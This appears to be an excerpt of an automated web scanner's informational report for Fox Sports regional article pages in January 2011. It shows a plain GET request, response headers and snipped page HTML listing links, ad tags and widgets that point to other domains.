<a href='/pages/gators' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14487.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cfb/teamstats.asp?team=0067&report=schedule' target = '_self' >Football Schedule</a>
...[SNIP]...
<a href='/pages/fsu' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14488.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cfb/teamstats.asp?yr=2010&report=schedule&team=0003' target = '_self' >Football Schedule</a>
...[SNIP]...
<a href='/pages/canes/0' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14726.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cfb/teamstats.asp?team=11&report=schedule' target = '_self' >Football Schedule</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14490.jpg border=0></a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsport/menu_images/14491.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849805?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849805?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849805?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/311606.jpg" alt="Heat3Peat_660.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_388962">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962^feedID=7926^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=388962&feedID=7926&" target=_blank rel="nofollow">
...[SNIP]...
rer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('When LeBron is bad, he's really, really good ') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsflorida.com/common/dynrss/dynrss_7926_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
</div>

<iframe src="http://facebook.com/plugins/like.php?href=http%3A%2F%2Fwac.2532.edgecastcdn.net/802532/foxsport%2F01%2F11%2F11%2FWhen-LeBron-is-bad-hes-really-really-goo%2Flanding_reiter.html%3FblockID%3D388962%26feedID%3D7926%26&amp;layout=button_count&amp;show-faces=true&amp;width=200&amp;action=like&amp;colorscheme=light" scrolling="no" allowtransparency="true" frameborder="0" style="border:none; width:200px;height:20px;"></iframe>
...[SNIP]...
<div style="text-align: left;"><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat"><div><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/327856.JPG" alt="HeatRepeat_20101026121924_0_0.JPG" alignment="none" vspace="" border="0" hspace=""></div>
...[SNIP]...
<br><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat">Visit
Heat or 3Peat Central</a>
...[SNIP]...
<a href="/pages/tvlisting_sun/0"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/358789.jpg" alt="Heat-Clippers_011211TON.jpg" alignment="texttop" vspace="" border="0" hspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849805?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849805?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849805?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(6)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(4)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(8)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(9)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(6)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(10)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(4)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(8)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<a href="http://www.foxsportsflorida.com/pages/videoplayer_heat/0"><img alt="heatbutton.png" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/309619.png" alignment="none" border="0"></a>
...[SNIP]...
<a href="/pages/videoplayer_heat/0"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/309476.jpg" alt="ClickHere_ButtonBLACK.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
<a href="/pages/heat_gamelounge/0"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/319253.jpg" alt="ATT_TuneIn_BULLS_011511.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
<a href="/pages/florida_heat_caption/0"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/337031.jpg" alt="WadetoJames_captionthis.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
<div><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/311517.jpg" alt="HEAT_SoundOff_SMALL.jpg" alignment="none" vspace="" border="0" hspace=""></div>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/311230.jpg" alt="HeatOR3Peat3_300.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a>
...[SNIP]...
<br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5.5. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<link rel="image_src" href="http://www.foxsportssouth.com/common/medialib/266/286571_thumb.jpg" />
<link href="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appcss/~1294847457/l=default~landing_bcstitle~menz1187~menz1188~stats~horizontal_tabs_1031~custom_classes~component_masthead~component_right_newton~component_footer/g=style/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script>
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS South</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7508.jpg border=0></a>
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FOX Sports Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FOX Sports Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FOX Sports Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FOX Sports Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FOX Sports Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FOX Sports Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FOX Sports Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FOX Sports North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FOX Sports Ohio</a>
...[SNIP]...
</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FOX Sports Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FOX Sports Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FOX Sports West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FOX Sports Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/hawks' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7522.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportssouth.stats.com/nba/teamstats.asp?teamno=01&type=schedule' target = '_self' >Full Schedule</a>
<a href='http://foxsportssouth.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportssouth.stats.com/nba/teamstats.asp?teamno=01&type=totstats' target = '_self' >Team Stats</a>
<a href='http://foxsportssouth.stats.com/nba/teamstats.asp?teamno=01&btnGo=Go&type=injuriesj' target = '_self' >Injuries</a>
<a href='http://foxsportssouth.stats.com/nba/teamstats.asp?teamno=01&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportssouth.stats.com/nba/notes.asp?type=trans' target = '_self' >Transactions</a>
<a href='http://foxsportssouth.stats.com/nba/index.asp' target = '_self' >League Stats</a>
<a href='http://foxsportssouth.stats.com/nba/teamstats.asp?teamno=01&btnGo=Go&type=clogs' target = '_self' >Game Logs</a>
<a href='http://foxsportssouth.stats.com/nba/players.asp' target = '_self' >Find a Player</a>
...[SNIP]...
<a href='/pages/thrashers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7521.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportssouth.stats.com/nhl/teamstats.asp?teamno=28&type=schedule' target = '_self' >Full Schedule</a>
<a href='http://foxsportssouth.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportssouth.stats.com/nhl/teamstats.asp?teamno=28&btnGo=Go&type=stats' target = '_self' >Team Stats</a>
<a href='http://foxsportssouth.stats.com/nhl/teamstats.asp?teamno=28&type=transactions' target = '_self' >Transactions</a>
<a href='http://foxsportssouth.stats.com/nhl/recentinj.asp' target = '_self' >Injuries</a>
<a href='http://foxsportssouth.stats.com/nhl/teamstats.asp?teamno=28&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportssouth.stats.com/nhl/index.asp?season=reg' target = '_self' >League Stats</a>
<a href='http://foxsportssouth.stats.com/nhl/players.asp' target = '_self' >Find a Player</a>
...[SNIP]...
<a href='/pages/braves' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7523.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportssouth.stats.com/mlb/teamreports.asp?tm=15&report=schedule' target = '_self' >Full Schedule</a>
<a href='http://foxsportssouth.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportssouth.stats.com/mlb/teamreports.asp?tm=15&report=stats' target = '_self' >Team Stats</a>
<a href='http://foxsportssouth.stats.com/mlb/stats.asp?file=recentinj' target = '_self' >Injuries</a>
<a href='http://foxsportssouth.stats.com/mlb/stats.asp?file=recenttrans' target = '_self' >Transactions</a>
<a href='http://foxsportssouth.stats.com/mlb/teamreports.asp?tm=15&report=roster' target = '_self' >Roster</a>
<a href='http://foxsportssouth.stats.com/mlb/teamreports.asp?yr=2009&tm=15&btnGo=Go&report=logs' target = '_self' >Game Logs</a>
<a href='http://foxsportssouth.stats.com/mlb/players.asp' target = '_self' >Find a Player</a>
...[SNIP]...
<a href='/pages/falcons' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/8969.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportssouth.stats.com/fb/teamstats.asp?teamno=01&type=schedules' target = '_self' >Full Schedule</a>
<a href='http://foxsportssouth.stats.com/fb/totalstandings.asp' target = '_self' >Standings</a>
<a href='http://foxsportssouth.stats.com/fb/index.asp' target = '_self' >League Stats</a>
<a href='http://foxsportssouth.stats.com/fb/recentinj.asp' target = '_self' >Injuries</a>
<a href='http://foxsportssouth.stats.com/fb/teamstats.asp?yr=2009&tm=1&btnGo=Go&type=rosters' target = '_self' >Roster</a>
<a href='http://foxsportssouth.stats.com/fb/recenttrans.asp' target = '_self' >Transactions</a>
<a href='http://foxsportssouth.stats.com/fb/players.asp' target = '_self' >Find a Player</a>
...[SNIP]...
<a href='http://www.foxsportssouth.com/pages/acc' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7524.jpg border=0></a>
<a href='/pages/sec' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7525.jpg border=0></a>
<a href='/pages/soconf' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/7526.jpg border=0></a>
<a href='http://www.foxsportssouth.com/pages/secgridironlive' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/16176.jpg border=0></a>
<a href='http://www.foxsportssouth.com/pages/cheer_home' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxsouth/menu_images/16532.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849839?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849839?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849839?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_389214">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214^feedID=4354^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=389214&feedID=4354&" target=_blank rel="nofollow">
...[SNIP]...
//www.facebook.com/sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('Size matters in the SEC') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportssouth.com/common/dynrss/dynrss_4354_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
</div>

<iframe src="http://facebook.com/plugins/like.php?href=http%3A%2F%2Fwac.2532.edgecastcdn.net/802532/foxsouth%2F01%2F11%2F11%2FSize-matters-in-the-SEC%2Flanding_bcstitle.html%3FblockID%3D389214%26feedID%3D4354%26&amp;layout=standard&amp;show-faces=true&amp;width=200&amp;action=like&amp;colorscheme=light" scrolling="no" allowtransparency="true" frameborder="0" style="border:none; width:200px;height:20px;"></iframe>
...[SNIP]...
<div><img src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/337203.jpg" alt="fa_auburnnewton_121010.jpg" alignment="none" border="0" vspace="" hspace=""></div>For all your BCS title game coverage go to <a href="http://www.foxSports.com">FOXSports.com</a>
...[SNIP]...
<a href='javascript:;FB_test_perm();'><img src='http://platformic-common.s3.amazonaws.com/global_images/facebook-large.gif' border=0></a>
...[SNIP]...
</div>
<IMG border=0 alt=BCSTitle_GameCoverage.jpg src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/345545.jpg" alignment="none"></div>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849839?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849839?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849839?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<a href="http://www.foxsportssouth.com/pages/video?PID=QjpXMOclqeM05BKgB2_7kwL0liTkmzb5"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/298600_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
<a href="http://www.foxsportssouth.com/pages/video?PID=MkAsKmBApQFCcnzk7YoxoEWjxgP93zez"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/291111_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
<a href="http://www.foxsportssouth.com/pages/video?PID=voS13za_9MZNBQRD4RGJx4t7oMNGhOGd"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/286212_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
